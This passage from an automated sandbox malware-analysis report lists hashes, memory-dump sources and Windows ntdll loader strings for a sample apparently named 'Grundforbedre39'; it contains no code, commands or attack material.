                                                                                      • Opcode Fuzzy Hash: 33168c09a65976f189ea7323749dca85acf5732a551fe50ec7f7df398a4d7e21
                                                                                      • Instruction Fuzzy Hash: 6951DA35744684AFE712CBA8C884F9ABBF8FF44748F4444A4E541DB692D774FA40CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 3557A396
                                                                                      • LdrpCompleteMapModule, xrefs: 3557A39D
                                                                                      • minkernel\ntdll\ldrmap.c, xrefs: 3557A3A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                      • API String ID: 0-1676968949
                                                                                      • Opcode ID: df79af7fd5a487564ac1570e5d0b071ca437e59d533ecfda8a73651430f2a26a
                                                                                      • Instruction ID: 4ac050f756ff69de006fbf454df705f2a60d6ff46a8888b152f085918b805d0e
                                                                                      • Opcode Fuzzy Hash: df79af7fd5a487564ac1570e5d0b071ca437e59d533ecfda8a73651430f2a26a
                                                                                      • Instruction Fuzzy Hash: 8C510E74B097819BE712CF68C885B1AB7E5FF40750F500AA8E9569B6E1DB71F900CF80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35581943
                                                                                      • LdrpAllocateTls, xrefs: 3558194A
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 35581954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-4274184382
                                                                                      • Opcode ID: 30d18d4471bc67e50b637ac71a579926ea30899bfe2d92b46a1cfdf2f1e33dd9
                                                                                      • Instruction ID: 1c65bbc3a48af903130d1d4157c7618ea3cde7f051914a74f5cecd30ef28e1f5
                                                                                      • Opcode Fuzzy Hash: 30d18d4471bc67e50b637ac71a579926ea30899bfe2d92b46a1cfdf2f1e33dd9
                                                                                      • Instruction Fuzzy Hash: EB4179B5A04649AFDB14CFA9D841BAEBBF1FF88300F448519E406AB350DB35B901CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • @SN5, xrefs: 3551A268
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 3551A229
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 3551A21B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @SN5$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-3925210525
                                                                                      • Opcode ID: 190fc506508033b29f2a2251f6eaba831a672876174d58cb3a52f43026c61f7b
                                                                                      • Instruction ID: 2ed1368d5dbab938d3896514f59a55bbf7ed0ec47f13d0cd7dba4490bb8bb7f5
                                                                                      • Opcode Fuzzy Hash: 190fc506508033b29f2a2251f6eaba831a672876174d58cb3a52f43026c61f7b
                                                                                      • Instruction Fuzzy Hash: CB41EEB4A04744DBEB06CFA9C440B597BB4FF85750F5488A5EC24DF2A4E776EA80CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3559B2B2
                                                                                      • GlobalFlag, xrefs: 3559B30F
                                                                                      • @, xrefs: 3559B2F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                      • API String ID: 0-4192008846
                                                                                      • Opcode ID: 2b633fbb1cb8666aff9eb6e29386a54db26594b54a55d596074e8fc0346f0b86
                                                                                      • Instruction ID: d798c0b254c396e295c38b4b3b282883d7349bb88c9b6e030d65a0fdd00fe22d
                                                                                      • Opcode Fuzzy Hash: 2b633fbb1cb8666aff9eb6e29386a54db26594b54a55d596074e8fc0346f0b86
                                                                                      • Instruction Fuzzy Hash: 6D3150B1E04209AFEB14DFA4DD80AEEBBBCEF44754F800469E605E7151DB78AE04CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpInitializeTls, xrefs: 35581851
                                                                                      • minkernel\ntdll\ldrtls.c, xrefs: 3558185B
                                                                                      • DLL "%wZ" has TLS information at %p, xrefs: 3558184A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                      • API String ID: 0-931879808
                                                                                      • Opcode ID: fd0f8ebbc7f3e882e33ce213c36c18ec7c120f4b320a68f66516455fab254aca
                                                                                      • Instruction ID: 46fe498042ad03b1f50f7243cf62da1f0ab122d620da56477a3d80a5c1615c10
                                                                                      • Opcode Fuzzy Hash: fd0f8ebbc7f3e882e33ce213c36c18ec7c120f4b320a68f66516455fab254aca
                                                                                      • Instruction Fuzzy Hash: D531E4F1B24284BBE7148B56D899FEA77B9FB90394F410419E502B7180EBB0BD418FA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 355985DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                      • API String ID: 0-702105204
                                                                                      • Opcode ID: ea06d25ca002ea01f1818a62ccb1e1e82c0ce244ebf2d1378e3e26ea4da6e371
                                                                                      • Instruction ID: 646dc2f689d47d5a5930ddab69aff03aaf59392a1c4a49ee2b84f79313bd56f2
                                                                                      • Opcode Fuzzy Hash: ea06d25ca002ea01f1818a62ccb1e1e82c0ce244ebf2d1378e3e26ea4da6e371
                                                                                      • Instruction Fuzzy Hash: D3012B7631C2446BEB3D4E15D858EDA3B76FFA43A0F840458E5025B452CF247C45CE94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 185a17bf1ef13135397087ee3b540990b8344816947cca21c7f9daa736916983
                                                                                      • Instruction ID: e57049535e374a43867b7e2e3fb44d52cca0e8987fb44b48a8b2e10aafa701a7
                                                                                      • Opcode Fuzzy Hash: 185a17bf1ef13135397087ee3b540990b8344816947cca21c7f9daa736916983
                                                                                      • Instruction Fuzzy Hash: 10614475B14606AFEB08DF7CC480A9DFBB5BF88344F24856AD819A7340DB74BA418BD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@
                                                                                      • API String ID: 0-149943524
                                                                                      • Opcode ID: c493b25e086ee96f86ae5113d6d325a0fdc223b5824671bb72e9d3b97d2ecb87
                                                                                      • Instruction ID: 481f14697998a5801b9830bf79bd7b8f027055d437c3eb57e1341562921a2e12
                                                                                      • Opcode Fuzzy Hash: c493b25e086ee96f86ae5113d6d325a0fdc223b5824671bb72e9d3b97d2ecb87
                                                                                      • Instruction Fuzzy Hash: D4328DB46083518FD724CF14C490B2EB7E6FF88744F90892EF9869B690E774E944CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 37eea7b47d568f780fa86c12541374b95d4aaa25f5c85b45102c3722be2fd757
                                                                                      • Instruction ID: 54b2588255f49feef23096c33f8e95a0c29302f3acabad6fc18c194ed4ee0ad7
                                                                                      • Opcode Fuzzy Hash: 37eea7b47d568f780fa86c12541374b95d4aaa25f5c85b45102c3722be2fd757
                                                                                      • Instruction Fuzzy Hash: C8319C31301B02AFEB459F25C990E8ABBB6BF84754F404155E90557A60EBB0FA21CFC0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Legacy$UEFI
                                                                                      • API String ID: 2994545307-634100481
                                                                                      • Opcode ID: 250b0005dc8f2492c8a2c71c906d30d517eca2a22daf5242556bfccd636c6f9f
                                                                                      • Instruction ID: d9792a56e6e352f435d9a59b9f28e1a3a4ef9f1ebfd7b53f822ed87ea62daacf
                                                                                      • Opcode Fuzzy Hash: 250b0005dc8f2492c8a2c71c906d30d517eca2a22daf5242556bfccd636c6f9f
                                                                                      • Instruction Fuzzy Hash: DA616AB1B443099FEB15CFA8C840AAEBBB9FF48740F50446EE549EB251EB31E905CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 355EB5C4
                                                                                      • RedirectedKey, xrefs: 355EB60E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                      • API String ID: 0-1388552009
                                                                                      • Opcode ID: c8636b4bf5698a33e09bf6e4f099a0714c49755c0eb737e1ce44e1a05ff19900
                                                                                      • Instruction ID: d98ceddf6a0fabf47d100424f8b4fcaa68d2fd0deaed36e7be1c6dc8a1cc3dc2
                                                                                      • Opcode Fuzzy Hash: c8636b4bf5698a33e09bf6e4f099a0714c49755c0eb737e1ce44e1a05ff19900
                                                                                      • Instruction Fuzzy Hash: 6B6107B5C11219EFDB15CFD4D988ADEBBB9FB08721F50406AF405A7240EB349A45CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$$
                                                                                      • API String ID: 3446177414-233714265
                                                                                      • Opcode ID: 6d870030308caabb0f6163cc283ec5cf53d856feaec5a90c6ddcc73e4d178602
                                                                                      • Instruction ID: 7a71c3eb1a994553b8195d3c11115c041a84a5530e5cec2e40f5f7b712ae6c97
                                                                                      • Opcode Fuzzy Hash: 6d870030308caabb0f6163cc283ec5cf53d856feaec5a90c6ddcc73e4d178602
                                                                                      • Instruction Fuzzy Hash: 6261DBB5A04749DFEB20CFA4E592B9DBBB2FF84304F504469D505AB690CB74B981CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: da0bc33f27bbc7db498747412564cbb05721973748391d84ac583ddf664fabab
                                                                                      • Instruction ID: 619185d64be27cac606cf3486cc509c6c1a823f0576dc7b40dcf10d4fb5b8e91
                                                                                      • Opcode Fuzzy Hash: da0bc33f27bbc7db498747412564cbb05721973748391d84ac583ddf664fabab
                                                                                      • Instruction Fuzzy Hash: FD31FC762087408BD302CBA8D840B1EB3E4FFD5768F520869ED558B380EB30E905CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P5$ P5
                                                                                      • API String ID: 0-2085283074
                                                                                      • Opcode ID: acf18f896da5f6a630bdf27d34def441a80a72c04febda0b6eedcfc7e937c85e
                                                                                      • Instruction ID: 27b7fc2361d846b36590151574b2b40843fa3c5f30fdad491a81653813807866
                                                                                      • Opcode Fuzzy Hash: acf18f896da5f6a630bdf27d34def441a80a72c04febda0b6eedcfc7e937c85e
                                                                                      • Instruction Fuzzy Hash: AB31B4376057119BEB12DE158898E6BBBA6BFC46A0F014929FC1597220EB30FD05CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$InW5
                                                                                      • API String ID: 0-2378685478
                                                                                      • Opcode ID: bbccf482addf0cabf651ea4d3929480c51d37387f80557514dca6e2b4d69adf4
                                                                                      • Instruction ID: dbab8f6a13298b8e73d3d3999f6ba9ab915dedfba3ef810cfb3869b1916b730f
                                                                                      • Opcode Fuzzy Hash: bbccf482addf0cabf651ea4d3929480c51d37387f80557514dca6e2b4d69adf4
                                                                                      • Instruction Fuzzy Hash: CE316CB664D301AFD311CF68C880A5BBBE8FB95654F81092EF99583260D734ED498BD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3558289F
                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 3558289A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                      • API String ID: 0-2653619699
                                                                                      • Opcode ID: 84a94399aeb6616e582f742ad551d82176b71ece1df19037e6152d364763740e
                                                                                      • Instruction ID: 627b7a414b7be960502e16131673f6168f000697cf82c96badf1709566577065
                                                                                      • Opcode Fuzzy Hash: 84a94399aeb6616e582f742ad551d82176b71ece1df19037e6152d364763740e
                                                                                      • Instruction Fuzzy Hash: 921129B2B04304FBFB198A48CD45F9F7AA9EB94750F918069B904DB284DA74ED4087A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: InW5$InW5
                                                                                      • API String ID: 0-3502319029
                                                                                      • Opcode ID: e25f0e16ed09ab4140bf669585f869e90f104a84defb850251f8a1ff9e05b3cf
                                                                                      • Instruction ID: f5bf07beef21f357b8703ef4ccf78b5fcca9d0d9f20de729ff58ac509c3db422
                                                                                      • Opcode Fuzzy Hash: e25f0e16ed09ab4140bf669585f869e90f104a84defb850251f8a1ff9e05b3cf
                                                                                      • Instruction Fuzzy Hash: 9211E172600208BFC7058F6CD8809BEBBB9EF99354F60846AF844CB250DA31ED55C7A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                      • API String ID: 2994545307-4008356553
                                                                                      • Opcode ID: 55a1c0fdf88a7143cdea9ce071a7936021268f39f3ef08f289d768e164b43cd0
                                                                                      • Instruction ID: 1d72ecfe00a8f43b71814b4005a6762a3f801a4da418cff41c20e07bdc24ff91
                                                                                      • Opcode Fuzzy Hash: 55a1c0fdf88a7143cdea9ce071a7936021268f39f3ef08f289d768e164b43cd0
                                                                                      • Instruction Fuzzy Hash: F901F4B2124784AFE311DF14CE06B5677F8E780716F018979EA5CC7590EB74E914CB86
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MUI
                                                                                      • API String ID: 0-1339004836
                                                                                      • Opcode ID: 654a5ec8b771315e16cf6dcf09949095d229a848f6950833712fdd74f2f49e74
                                                                                      • Instruction ID: 8296e4af3e288dc628c70f6eeb9484a7f5a7b68ff14a0e5b6f3f4efdac55331e
                                                                                      • Opcode Fuzzy Hash: 654a5ec8b771315e16cf6dcf09949095d229a848f6950833712fdd74f2f49e74
                                                                                      • Instruction Fuzzy Hash: 5F825CB9E003189BFF15CFA9C881B9DBBB1BF48350F518569DC19AB250DB71AE81CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @[`5@[`5
                                                                                      • API String ID: 0-3303779981
                                                                                      • Opcode ID: 41a5e42a9a733ec866d69c776018fd951d8bd996ee2e9d9493eb9e55c9742849
                                                                                      • Instruction ID: 022c4a161f4cf8588754448f32074bd18d04d190310b4b01b439b71eec652cb4
                                                                                      • Opcode Fuzzy Hash: 41a5e42a9a733ec866d69c776018fd951d8bd996ee2e9d9493eb9e55c9742849
                                                                                      • Instruction Fuzzy Hash: 9032D7B5E05219DFDF14CFA8C841BAEBBB1FF84764F540529E80AAB350E775A901CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6502fc8d0f228a46685a8a0413049e08ee008a7fe184e5faa7ab281f9646726a
                                                                                      • Instruction ID: bc38674068c854023421ae02cd3473905f9380c65c6bbe67b427ec2d36f8ed92
                                                                                      • Opcode Fuzzy Hash: 6502fc8d0f228a46685a8a0413049e08ee008a7fe184e5faa7ab281f9646726a
                                                                                      • Instruction Fuzzy Hash: 2DA11F71E45718AFEB11CBA4C845F9EBBF5BF44764F010526E925AB290DB74B840CBC1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
                                                                                      • Opcode ID: 715b9dff5fcd505333a1516bb35377b48367071b243d53ace9f9c20027702e78
                                                                                      • Instruction ID: 0bbc402ee737b4c7cd83b4c63930de7fb1611ab05afe2cfdfadd97d6af58a1a7
                                                                                      • Opcode Fuzzy Hash: 715b9dff5fcd505333a1516bb35377b48367071b243d53ace9f9c20027702e78
                                                                                      • Instruction Fuzzy Hash: 12B102B5A093809FD754CF28C480A5AFBF1BF88308F54596EE899CB351D771E945CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1278396384.00000000354E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.1278396384.0000000035609000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000004.00000002.1278396384.000000003560D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_354e0000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID:
                                                                                      • API String ID: 3446177414-0
